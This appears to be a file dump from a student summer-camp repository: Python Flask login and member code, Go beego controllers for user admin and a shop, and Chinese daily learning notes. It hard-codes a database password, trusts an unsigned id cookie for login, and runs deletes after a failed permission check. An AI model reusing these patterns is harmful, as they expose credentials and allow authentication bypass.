0: # 管理员登录\n cursor.execute(\"update mem_info set status=4 where id=%s\", id)\n elif now_status[0] > 2: # 判断是否已经登录\n return \"you hava logined\"\n elif now_status[0] == 0: # 还未被认证的用户登录\n return \"you have not been identified\"\n db.commit()\n return rsp\n return 'id or password wrong'\n\n\ndef mem_register(id, password, name, email, groups):\n cursor.execute(\"select * from mem_info where id=%s||name=%s\", (\n id,\n name,\n ))\n if cursor.fetchone() == (None):\n cursor.execute(\n \"insert into mem_info(id,name,password,email,groups,status) values(%s,%s,%s,%s,%s,0)\",\n (\n id,\n name,\n password,\n email,\n groups,\n ))\n db.commit()\n return \"you success register,wait for identify\"\n else:\n return \"the id or name have used\"\n\n\ndef find_no_register():\n cursor.execute(\"select * from mem_info where status=0\")\n no_register_mem = []\n find_mem = cursor.fetchall()\n for mem in find_mem:\n no_register_mem.append(mem)\n return json.dumps(no_register_mem)\n\n\ndef add_new_member(id, password, name, email, groups, status):\n cursor.execute(\"select * from mem_info where id=%s||name=%s\", (\n id,\n name,\n ))\n if cursor.fetchone() == (None):\n if status == 1:\n cursor.execute(\n \"insert into mem_info(id,name,password,email,groups,status) values(%s,%s,%s,%s,%s,1)\",\n (\n id,\n name,\n password,\n email,\n groups,\n ))\n elif status == 2:\n cursor.execute(\n \"insert into mem_info(id,name,password,email,groups,status) values(%s,%s,%s,%s,%s,2)\",\n (\n id,\n name,\n password,\n email,\n groups,\n ))\n db.commit()\n return \"you success add\"\n else:\n return \"the id or name have used\"\n\n\ndef delete_member(id):\n cursor.execute(\"select * from mem_info where id=%s\", id)\n if cursor.fetchone() == (None):\n return \"no this member\"\n cursor.execute(\"delete from mem_info where id=%s\", id)\n db.commit()\n return \"success delete this member\"\n\n\ndef change_member(id, password, name, email, groups):\n if password:\n cursor.execute(\"update mem_info set 
password=%s where id=%s\", (\n password,\n id,\n ))\n if name:\n cursor.execute(\"update mem_info set name=%s where id=%s\", (\n name,\n id,\n ))\n if email:\n cursor.execute(\"update mem_info set email=%s where id=%s\", (\n email,\n id,\n ))\n if groups:\n cursor.execute(\"update mem_info set groups=%s where id=%s\", (\n groups,\n id,\n ))\n db.commit()\n return \"you have successfully change this member's information\"\n\n\ndef find_all():\n cursor.execute(\"select * from mem_info\")\n members = []\n find_mem = cursor.fetchall()\n for mem in find_mem:\n members.append(mem)\n return json.dumps(members)\n\n\ndef group_member(groups):\n cursor.execute(\"select * from mem_info where groups=%s\", groups)\n members = []\n find_mem = cursor.fetchall()\n i = 0\n for mem in find_mem:\n if find_mem[i][5] != 0: # 未认证的不算组员\n members.append(mem)\n i += 1\n return json.dumps(members)\n\n\ndef mem_logout(id):\n cursor.execute(\"select status from mem_info where id=%s\", id)\n now_status = cursor.fetchone()\n if now_status[0] == 3: # 普通用户登出\n cursor.execute(\"update mem_info set status=1 where id=%s\", id)\n elif now_status[0] == 4: # 管理员登出\n cursor.execute(\"update mem_info set status=2 where id=%s\", id)\n resp = make_response(\"you have successfully logout\")\n resp.delete_cookie('id')\n db.commit()\n return resp\n" }, { "alpha_fraction": 0.5705623030662537, "alphanum_fraction": 0.5909591913223267, "avg_line_length": 30.824562072753906, "blob_id": "c61cac4f721fb4f0d14e37e8a84af83232a2e22f", "content_id": "b43116b270e1ea1761be07b73c08c6e59180c124", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1934, "license_type": "no_license", "max_line_length": 76, "num_lines": 57, "path": "/Old-Li883/mall/model/guys.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "\"\"\"\n所有人的操作\n登录和登出\n\"\"\"\n\nimport pymysql\nfrom flask import make_response\nfrom werkzeug.security import 
check_password_hash\nfrom util.response import response\n\ndb = pymysql.connect(\n host=\"127.0.0.1\", user=\"root\", db=\"mall\", passwd=',lch980929')\ncursor = db.cursor()\n\n\ndef login(id, pwd, status):\n \"\"\"\n client 成功只验证了未认证的失败和验证了的成功这两个示例\n \"\"\"\n if status == '1': # 登录时三种用户分开登录\n cursor.execute(\"select identify from client where id=%s\", id)\n now_status = cursor.fetchone()\n if now_status[0] == 0: # 判断是否被认证通过\n return response(400, \"have not been identify\")\n else:\n cursor.execute(\"select password from client where id=%s\", id)\n elif status == '2':\n cursor.execute(\"select identify from merchant where id=%s\", id)\n now_status = cursor.fetchone()\n if now_status[0] == 0:\n return response(400, \"have not been identify\")\n else:\n cursor.execute(\"select password from merchant where id=%s\", id)\n elif status == '3':\n cursor.execute(\"select identify from administrator where id=%s\", id)\n now_status = cursor.fetchone()\n if now_status[0] == 0:\n return response(400, \"have not been identify\")\n else:\n cursor.execute(\"select password from administrator where id=%s\",\n id)\n accurate_pwd = cursor.fetchone()\n if accurate_pwd != ():\n if check_password_hash(accurate_pwd[0], pwd):\n rsp = make_response('{\"status\":\"200\"}')\n rsp.set_cookie('id', id) # 返回登录者id\n return rsp\n else:\n return response(401, \"password_wrong\")\n else:\n return response(402, \"id_wrong\")\n\n\ndef logout():\n resp = make_response(\"{'status': 200}\")\n resp.delete_cookie('id')\n return resp\n" }, { "alpha_fraction": 0.8246753215789795, "alphanum_fraction": 0.8636363744735718, "avg_line_length": 21.14285659790039, "blob_id": "5e7dcca2ea3138e37337c73104bd8c84efe6ca00", "content_id": "9e8bde46d7edf67355e9fffca88998de9729a235", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 374, "license_type": "no_license", "max_line_length": 51, "num_lines": 7, "path": "/Shixiaoyanger/日报/7.21.md", "repo_name": 
"tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.21日报\n\n1.今天把slice和map重新看了一下 利用range和for循环将多个数据取出来了\n\n2.在文杰的提醒下重构了返回信息,你多个结构体实现了同时返回具体信息和状态信息的格式统一的json数组\n\n3.利用数据库的高级操作和原生语句,实现了商品浏览量的统计,以及热门查询的有关操作" }, { "alpha_fraction": 0.6470391154289246, "alphanum_fraction": 0.6474860310554504, "avg_line_length": 23.389646530151367, "blob_id": "d799cbc743394e54eb0b2ce4fa780712c3b344ea", "content_id": "d2c3407a21bbd44c7d745d24079c968d93ef58e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 9512, "license_type": "no_license", "max_line_length": 145, "num_lines": 367, "path": "/jackwener/server/练手/controllers/admin.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"hello/models/class\"\n\t\"github.com/astaxie/beego/orm\"\n\t\"fmt\"\n\t\"hello/models\"\n\t\"encoding/json\"\n\t\"hello/encryptions\"\n\t\"strings\"\n)\n\n// 通过路由/manager/apply,发送get请求就能返回所有身份为\"apply\"(申请者)的Json数据\nfunc (c *UserController) ListApply(){\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar posts []class.User\n\to := orm.NewOrm()\n\to.QueryTable(\"user\").Filter(\"status\",\"apply\").All(&posts, \"id\", \"name\", \"nickname\", \"email\", \"phone\", \"group\", \"status\")\n\tfmt.Println(posts)\n\tu := 
models.Info{User:posts,Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\n// 通过路由/manager/apply,发送post请求,通过请求中Json的User[]的id,可以批量批准Json中Use[]成员的注册\n// 即将\"status\"由\"apply\"改为\"stuff\"\nfunc (c *UserController) UpdateApply() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tusers := ob.User\n\to := orm.NewOrm()\n\tfor _, user := range users{\n\t\tid := user.Id\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"status\": \"stuff\"})\n\t}\n\tu := models.Info{Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\n// 通过路由/manager/user,发送get请求,就能返回所有非\"apply\"成员的信息的Json数据\nfunc (c *UserController) UserList() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = 
true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar posts []class.User\n\to := orm.NewOrm()\n\to.QueryTable(\"user\").Exclude(\"status\",\"apply\").All(&posts, \"id\", \"name\", \"nickname\", \"email\", \"phone\", \"group\", \"status\")\n\tfmt.Println(posts)\n\tu := models.Info{User:posts,Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\nfunc(c *UserController) PageUserAdd() {\n\tCheckLogin(c)\n}\n\n// 通过路由/manager/user/add,发送post请求,批量添加Json中User[]的用户\n// 管理员添加用户默认为\"staff\",添加不可指定id,避免冲突\nfunc(c *UserController) UserAdd() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tusers := ob.User\n\tfor _, user := range users {\n\t\tuser.Status = \"staff\"\n\t\tuser.Password = encryptions.Salt(user.Password)\n\t}\n\to := orm.NewOrm()\n\tqs := o.QueryTable(\"user\")\n\ti, _ := qs.PrepareInsert()\n\tfor _, user := range users {\n\t\tid, err := i.Insert(&user)\n\t\tif err == nil {\n\t\t\tfmt.Println(id)\n\t\t}\n\t}\n\ti.Close() // 不要忘记关闭 statement\n\tu := models.Info{Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\nfunc (c *UserController) PageUserDelete(){\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = 
u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n}\n\n// 通过路由/manager/user/delete,发送post请求,通过读取请求Json中User[]的id值,批量删除Json中User[]的用户\nfunc (c *UserController) UserDelete(){\n\tCheckLogin(c)\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\to := orm.NewOrm()\n\tusers := ob.User\n\tfor _, user := range users {\n\t\tid := user.Id\n\t\tif num, err := o.QueryTable(\"user\").Filter(\"id\", id).Delete(); err == nil {\n\t\t\tfmt.Println(num)\n\t\t}\n\t}\n\tu := models.Info{Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\nfunc (c *UserController) PageUserUpdate() {\n\tCheckLogin(c)\n}\n\n// 通过路由/manager/user/update,发送post请求,默认通过读取请求Json中User[0]的id值,单个更新Json中User[]的用户\n// 不可更新id值\nfunc (c *UserController) UserUpdate() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\to := 
orm.NewOrm()\n\tuser := ob.User[0]\n\tid := user.Id\n\tif user.Status !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"status\": user.Status})\n\t}\n\tif user.Name !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"name\": user.Name})\n\t}\n\tif user.Nickname !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"nickname\": user.Nickname})\n\t}\n\tif user.Group !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"group\": user.Group})\n\t}\n\tif user.Password !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"password\": encryptions.Salt(user.Password)})\n\t}\n\tif user.Email !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"email\": user.Email})\n\t}\n\tif user.Phone !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"phone\": user.Phone})\n\t}\n\tu := models.Info{Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\nfunc (c *UserController) PageGroupList(){\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n}\n\n// 通过路由/manager/user/group,发送post请求,默认通过读取请求Json中User[0]的group值,列出该group中所以成员\nfunc (c *UserController) GroupList() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := 
models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tgroup := ob.User[0].Group\n\tvar posts []class.User\n\to := orm.NewOrm()\n\to.QueryTable(\"user\").Filter(\"group\", group).Exclude(\"status\",\"apply\").All(&posts, \"id\", \"name\", \"nickname\", \"email\", \"phone\", \"group\", \"status\")\n\tfmt.Println(posts)\n\tu := models.Info{User:posts,Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}" }, { "alpha_fraction": 0.7571428418159485, "alphanum_fraction": 0.800000011920929, "avg_line_length": 10.833333015441895, "blob_id": "7151c20e415f061547765467a95093153170efcc", "content_id": "6d594c2a5425fb0b181012dbfec432429a0cd377", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 156, "license_type": "no_license", "max_line_length": 24, "num_lines": 6, "path": "/Shixiaoyanger/日报/7.13.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.13日报\n写出了大致的框架 虽然前后端没分离\n\n但是除了cookie和加密其他的功能基本都实现了\n\n具体内容已经push啦" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 4, "blob_id": "951609d0669efc336fc968589ea30135ff85d00e", "content_id": "2a8cc6a84e70cab78f593150e73027c2afb40d73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 26, "license_type": "no_license", "max_line_length": 6, 
"num_lines": 3, "path": "/Old-Li883/日报/7.11.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.11\n\n忙于工程实训" }, { "alpha_fraction": 0.6327769160270691, "alphanum_fraction": 0.6418816447257996, "avg_line_length": 22.54464340209961, "blob_id": "ac5e3594239d6747f01fa83f6d56cbff5cd87fac", "content_id": "f727ebf58d423885c4e8c828fbe202c74e7c3bbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2696, "license_type": "no_license", "max_line_length": 90, "num_lines": 112, "path": "/jackwener/server/mall/controllers/admin.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"mall/models\"\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"github.com/astaxie/beego/orm\"\n)\n\nfunc (c *MainController) AddGoods() {\n\tvar ob models.GoodJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\ttitle := ob.Good[0].Title\n\tkind := ob.Good[0].Kind\n\tprice := ob.Good[0].Price\n\tlocal := ob.Good[0].Local\n\tintro := ob.Good[0].Intro\n\tvar good models.Good\n\tgood.Intro = intro\n\tgood.Price = price\n\tgood.Kind = kind\n\tgood.Local = local\n\tgood.Id = title\n\tgood.Views = 0\n\to := orm.NewOrm()\n\t_, err := o.Insert(&good)\n\tvar reJson models.GoodJson\n\tif err == nil {\n\t\treJson.Status = 200\n\t\treJson.Message = \"添加成功\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\treJson.Status = 400\n\t\treJson.Message = \"添加失败\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n}\n\nfunc (c *MainController) DeleteGoods() {\n\tvar ob models.GoodJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\ttitle := ob.Good[0].Title\n\to := orm.NewOrm()\n\t_, err := o.QueryTable(\"good\").Filter(\"title\",title).Delete()\n\tvar reJson models.GoodJson\n\tif err == nil {\n\t\treJson.Status = 200\n\t\treJson.Message = \"删除成功\"\n\t\tc.Data[\"json\"] = 
reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\treJson.Status = 400\n\t\treJson.Message = \"删除失败\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n}\n\nfunc (c *MainController) UpdateGoods() {\n\tvar ob models.GoodJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tgood := ob.Good[0]\n\to := orm.NewOrm()\n\tif good.Local != \"\"{\n\t\to.QueryTable(\"good\").Filter(\"title\", good.Title).Update(orm.Params{\"local\": good.Local})\n\t}\n\tif good.Intro != \"\"{\n\t\to.QueryTable(\"good\").Filter(\"title\", good.Title).Update(orm.Params{\"intro\": good.Intro})\n\t}\n\tif good.Kind != \"\"{\n\t\to.QueryTable(\"good\").Filter(\"title\", good.Title).Update(orm.Params{\"kind\": good.Kind})\n\t}\n\tif good.Price != 0{\n\t\tvar old models.Good\n\t\to.QueryTable(\"good\").Filter(\"title\", good.Title).One(&old)\n\t\tif good.Price < old.Price {\n\t\t\tvar cars []*models.Car\n\t\t\t_, err := o.QueryTable(\"car\").Filter(\"Goods__Good__Title\", good.Title).All(&cars)\n\t\t\tif err == nil {\n\t\t\t\tvar name []string\n\t\t\t\tfor i, _ := range cars{\n\t\t\t\t\tname[i] = cars[i].Id\n\t\t\t\t}\n\t\t\t\tvar inform models.Inform\n\t\t\t\tfor _, name := range name{\n\t\t\t\t\tinform.Id = name\n\t\t\t\t\tvar user models.User\n\t\t\t\t\to.QueryTable(\"user\").Filter(\"name\",name).One(&user)\n\t\t\t\t\tinform.User = &user\n\t\t\t\t\tinform.Content = \"您收藏的商品\"+name+\"已经降价\"\n\t\t\t\t\to.Insert(&inform)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\to.QueryTable(\"good\").Filter(\"title\", good.Title).Update(orm.Params{\"price\": good.Price})\n\t}\n\tvar reJson models.GoodJson\n\treJson.Status = 200\n\treJson.Message = \"修改成功\"\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n\treturn\n}" }, { "alpha_fraction": 0.7246654033660889, "alphanum_fraction": 0.7323135733604431, "avg_line_length": 25.149999618530273, "blob_id": "b82bb2deb9dd4c41eab290fd18bac68d0f5cbec6", "content_id": "3213cbeba92ff08648e2f196f2e7501aa76df508", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 523, "license_type": "no_license", "max_line_length": 68, "num_lines": 20, "path": "/yixiaoer/server/src/project1/main.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"github.com/labstack/echo\"\n\t\"project/controller\"\n)\n\nfunc main() {\n\te := echo.New()\n\n\te.POST(\"/login\", controller.Login)\n\te.POST(\"/sign-up\", controller.SignUp)\n\te.DELETE(\"/homepage/members-delete\", controller.DeleteMember)\n\te.POST(\"/homepage/groups-show\", controller.ShowGroup)\n\te.POST(\"/homepage/information-get\", controller.GetInformation)\n\te.PUT(\"/homepage/groups-add\", controller.AddGroup)\n\te.PUT(\"/homepage/information-change\", controller.ChangeInformation)\n\n\te.Logger.Fatal(e.Start(\":8080\"))\n}\n" }, { "alpha_fraction": 0.6644981503486633, "alphanum_fraction": 0.6756505370140076, "avg_line_length": 19.69230842590332, "blob_id": "2a0c05d463da73de79ae1fbe31dd11bc9e475317", "content_id": "f4adb0640c45900d5b9a40162c02f3633aa34f5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1092, "license_type": "no_license", "max_line_length": 80, "num_lines": 52, "path": "/jackwener/server/练手/controllers/permission.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"github.com/astaxie/beego/session\"\n\t\"strings\"\n\t\"hello/models\"\n\t\"fmt\"\n)\n\nvar globalSessions *session.Manager\n\nfunc init() {\n\tsessionConfig := &session.ManagerConfig{\n\t\tCookieName:\"gosessionid\",\n\t\tEnableSetCookie: true,\n\t\tGclifetime:3600,\n\t\tMaxlifetime: 3600,\n\t\tSecure: false,\n\t\tCookieLifeTime: 3600,\n\t\tProviderConfig: \"./tmp\",\n\t}\n\tglobalSessions, _ = session.NewManager(\"memory\",sessionConfig)\n\tgo globalSessions.GC()\n}\n\nfunc CheckLogin(c *UserController){\n\terr := 
c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n}\n" }, { "alpha_fraction": 0.6604264378547668, "alphanum_fraction": 0.6703068017959595, "avg_line_length": 23.653846740722656, "blob_id": "e1310a4d63b153b18de2d4e7304e3806c5ffd7ec", "content_id": "9891c43a5e7c4265596e6f3e35903d798585082c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3781, "license_type": "no_license", "max_line_length": 102, "num_lines": 78, "path": "/yixiaoer/日报/7.7.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.7周报\n\n## 今日计划\n1. 尝试pr\n2. 语言(Go)的学习\n3. 涉及知识的学习\n\n## 完成情况\n### 关于pull request\n (晚上尝试&了解)\n\n\n### 关于Go\n1. **range**(range 关键字用于 for 循环中迭代数组(array)、切片(slice)、通道(channel)或集合(map)的元素)\n- 在map中返回其中的key值\n-使用for...range循环\n 其中的value,是一个值拷贝,而不是元素本身\n2. 
**map**(无序的)\n- 定义除用关键字外还可以用make函数\n> 一种元素对(pair)的无序集合,pair 的一个元素是key,对应的另一个元素是value,所以这个结构也称为关联数组或字典。这是一种快速寻找值的理想结构:给定key,对应的value可以迅速定位。\n- comma-ok断言(类型断言)\n > value, ok := element.(T)\n > element:要判断的变量,element必须是interface类型\n > T:被判断的类型,普通类型\n > value:返回的值\n > ok:是否为该类型\n > 如果断言失败,ok为false,否则ok为true并且value为变量的值\n- delete( )函数删除集合中的元素\n delete(map,key)则删除map中对应key元素\n ```Go\n m := make(map[string]int)\n \n m[\"Answer\"] = 42 //在map m中插入或修改元素\n \n m[\"Answer\"] = 48\n \n delete(m, \"Answer\") //删除元素\n \n v, ok := m[\"Answer\"] 检测某个值是否存在\n ```\n3. **语言类型转换**\n4. **接口**(任何其他类型只要实现了这些方法就是实现了这个接口???)\n5. **goroutine与channel**\n 1. c.f.并发&并行\n> 并发是两个任务可以在重叠的时间段内启动,运行和完成;是独立执行过程的组合;是一次处理很多事情\n> 并行是任务在同一时间运行,例如,在多核处理器上;是同时执行(可能相关的)计算;是同时做很多事情\n> 应用程序可以是并发的,但不是并行的,这意味着它可以同时处理多个任务,但是没有两个任务在同一时刻执行\n> 应用程序可以是并行的,但不是并发的,这意味着它同时处理多核CPU中的任务的多个子任务\n> 一个应用程序可以既不是并行的,也不是并发的,这意味着它一次一个地处理所有任务\n> 应用程序可以即是并行的也是并发的,这意味着它同时在多核CPU中同时处理多个任务\n 2. goroutine\n 